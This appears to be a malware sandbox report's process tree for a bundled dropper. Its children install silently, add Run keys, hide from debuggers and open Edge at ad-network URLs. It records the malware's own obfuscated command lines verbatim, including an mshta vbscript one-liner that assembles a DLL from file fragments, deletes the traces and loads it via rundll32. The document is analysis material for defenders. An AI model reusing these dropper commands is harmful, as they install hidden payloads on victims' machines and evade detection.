C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C COpy /Y "C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF "/pni3MGzH3fZ3zm0HbFMiEo11u" =="" for %z iN ("C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE") do taskkill -f /Im "%~nXz"12⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscript: cLoSE ( cREAtEObJect ( "wSCRipT.SHELl" ). Run("Cmd /Q /C eCHo | SeT /p = ""MZ"" > 4~T6.Kj6& cOPy /b /y 4~T6.kJ6 +JJDPQL_.2B+ Z8ISJ6._Nm+oAykH.~~ +kdDPiLEn.~T5 + MZaNA.E ..\Kz_AMsXL.6g & Del /q *& STArT control ..\kZ_AmsXL.6G " ,0, trUE ) )11⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C eCHo | SeT /p = "MZ" > 4~T6.Kj6&cOPy /b /y 4~T6.kJ6+JJDPQL_.2B+Z8ISJ6._Nm+oAykH.~~ +kdDPiLEn.~T5 + MZaNA.E ..\Kz_AMsXL.6g & Del /q *& STArT control ..\kZ_AmsXL.6G12⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>4~T6.Kj6"13⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHo "13⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\control.execontrol ..\kZ_AmsXL.6G13⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\kZ_AmsXL.6G14⤵
- Loads dropped DLL
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\kZ_AmsXL.6G15⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\kZ_AmsXL.6G16⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\is-6G8EC.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-6G8EC.tmp\setup_2.tmp" /SL5="$500AA,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"8⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT9⤵
-
C:\Users\Admin\AppData\Local\Temp\is-4R1N9.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-4R1N9.tmp\setup_2.tmp" /SL5="$502B4,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT10⤵
-
C:\Users\Admin\AppData\Local\Temp\is-G0A2L.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-G0A2L.tmp\postback.exe" ss111⤵
-
C:\Users\Admin\AppData\Local\Temp\xiuyingzhang-game.exe"C:\Users\Admin\AppData\Local\Temp\xiuyingzhang-game.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"7⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri1008c7d6874.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\Fri1008c7d6874.exeFri1008c7d6874.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri10b0a06a73706.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\Fri10b0a06a73706.exeFri10b0a06a73706.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\1545689.scr"C:\Users\Admin\AppData\Roaming\1545689.scr" /S6⤵
-
C:\Users\Admin\AppData\Roaming\8350716.scr"C:\Users\Admin\AppData\Roaming\8350716.scr" /S6⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\3012335.scr"C:\Users\Admin\AppData\Roaming\3012335.scr" /S6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\1957141.scr"C:\Users\Admin\AppData\Roaming\1957141.scr" /S6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\5918144.scr"C:\Users\Admin\AppData\Roaming\5918144.scr" /S6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri1018ef4aa251c026c.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\Fri1018ef4aa251c026c.exeFri1018ef4aa251c026c.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri10720d229511df563.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\Fri10720d229511df563.exeFri10720d229511df563.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri10fcc13ae0125c8.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\Fri10fcc13ae0125c8.exeFri10fcc13ae0125c8.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri105268dda3.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\Fri105268dda3.exeFri105268dda3.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3864 -s 2446⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri10acd1e0a9e6.exe /mixone4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri10d184202996a0d7f.exe4⤵
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv bIwyp2o330q1fggh9KFnew.0.21⤵
- Modifies data under HKEY_USERS
-
C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\Fri10d184202996a0d7f.exeFri10d184202996a0d7f.exe1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\Fri10acd1e0a9e6.exeFri10acd1e0a9e6.exe /mixone1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5304 -s 2442⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\is-MHCJ5.tmp\Fri10fcc13ae0125c8.tmp"C:\Users\Admin\AppData\Local\Temp\is-MHCJ5.tmp\Fri10fcc13ae0125c8.tmp" /SL5="$10220,239846,156160,C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\Fri10fcc13ae0125c8.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-M5BBB.tmp\Sayma.exe"C:\Users\Admin\AppData\Local\Temp\is-M5BBB.tmp\Sayma.exe" /S /UID=burnerch22⤵
-
C:\Program Files\MSBuild\ZCHWNTMNHE\ultramediaburner.exe"C:\Program Files\MSBuild\ZCHWNTMNHE\ultramediaburner.exe" /VERYSILENT3⤵
-
C:\Users\Admin\AppData\Local\Temp\is-4I113.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-4I113.tmp\ultramediaburner.tmp" /SL5="$80080,281924,62464,C:\Program Files\MSBuild\ZCHWNTMNHE\ultramediaburner.exe" /VERYSILENT4⤵
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu5⤵
-
C:\Users\Admin\AppData\Local\Temp\ad-b57fb-ee0-adcb2-f27dd7534f889\Pozhubicidu.exe"C:\Users\Admin\AppData\Local\Temp\ad-b57fb-ee0-adcb2-f27dd7534f889\Pozhubicidu.exe"3⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e64⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffcae8846f8,0x7ffcae884708,0x7ffcae8847185⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2232,12151040537817099295,16592810856322217435,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2244 /prefetch:25⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2232,12151040537817099295,16592810856322217435,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2296 /prefetch:35⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2232,12151040537817099295,16592810856322217435,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2648 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,12151040537817099295,16592810856322217435,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3248 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,12151040537817099295,16592810856322217435,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3256 /prefetch:15⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,12151040537817099295,16592810856322217435,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5020 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,12151040537817099295,16592810856322217435,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5092 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,12151040537817099295,16592810856322217435,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3244 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2232,12151040537817099295,16592810856322217435,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5708 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2232,12151040537817099295,16592810856322217435,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5708 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,12151040537817099295,16592810856322217435,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5452 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,12151040537817099295,16592810856322217435,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5992 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2232,12151040537817099295,16592810856322217435,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1808 /prefetch:25⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,12151040537817099295,16592810856322217435,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4596 /prefetch:15⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Loads dropped DLL
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2232,12151040537817099295,16592810856322217435,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4720 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,12151040537817099295,16592810856322217435,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3136 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,12151040537817099295,16592810856322217435,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1248 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,12151040537817099295,16592810856322217435,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6032 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2232,12151040537817099295,16592810856322217435,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1040 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,12151040537817099295,16592810856322217435,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6072 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,12151040537817099295,16592810856322217435,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6304 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,12151040537817099295,16592810856322217435,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4056 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,12151040537817099295,16592810856322217435,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5376 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2232,12151040537817099295,16592810856322217435,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5240 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,12151040537817099295,16592810856322217435,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5176 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,12151040537817099295,16592810856322217435,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1880 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,12151040537817099295,16592810856322217435,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6232 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,12151040537817099295,16592810856322217435,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7108 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2232,12151040537817099295,16592810856322217435,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1244 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,12151040537817099295,16592810856322217435,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6184 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,12151040537817099295,16592810856322217435,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6588 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,12151040537817099295,16592810856322217435,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6596 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2232,12151040537817099295,16592810856322217435,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5164 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2232,12151040537817099295,16592810856322217435,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6232 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,12151040537817099295,16592810856322217435,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3872 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,12151040537817099295,16592810856322217435,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5776 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,12151040537817099295,16592810856322217435,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4604 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,12151040537817099295,16592810856322217435,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6896 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,12151040537817099295,16592810856322217435,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1908 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad4⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcae8846f8,0x7ffcae884708,0x7ffcae8847185⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18514834⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcae8846f8,0x7ffcae884708,0x7ffcae8847185⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18515134⤵
-
